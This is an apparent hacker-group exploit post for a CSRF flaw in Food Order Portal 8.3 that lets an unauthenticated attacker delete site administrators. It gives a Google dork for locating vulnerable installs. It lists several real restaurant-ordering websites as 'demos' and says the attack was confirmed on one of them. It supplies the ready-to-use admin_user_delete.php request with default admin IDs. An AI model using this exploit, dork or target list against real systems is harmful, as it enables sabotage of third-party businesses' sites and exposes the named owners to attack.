Food Order Portal 8.3 - (CSRF) Remote Admin Delete PoC ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact(onlymail) : knockout@e-mail.com.tr [~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com [~] Greetz: DaiMon,furty,BackDoor,EthicalHacker,BARCOD3,SZE&#169;,VolqaN,Septemb0x | Unuttuklarmz affola.. ############################################################ Turkey Security Group 'h4x0re SECURITY' ########################################################### ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Food Order Portal |~Affected Version : 8.3 |~Official Web and referance's : http://www.tourismscripts.com/scripts/scripts/food-order-portal-multi-restaurant-lingual-php-script.html |~RISK : Medium |~Google Keyword/Dork : inurl:login_restaurant.php | are example |~Tested On : Kali Linux \ Tested Browser: Mozilla Firefox \ Arora ####################INFO################################ without logging in to the admin panel it is possible to delete administrator.. ######################################################## ######################################################## Demos ; http://click4foods.co.uk <=== Tested and panel was checked. CSRF was confirmed ( From the official site of reference are shown ) http://www.saveonmeals.com http://pizzatakeway.it/ http://myfood24.it/ http://www.foodrunner.ru/ .. .. ==============================================================================00 CSRF PoC: http://[VICTIM]/admin/admin_user_delete.php?admin_id=[ADMIN ID] (Default: 1,2) Administrator Deleted. ==============================================================================00 .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/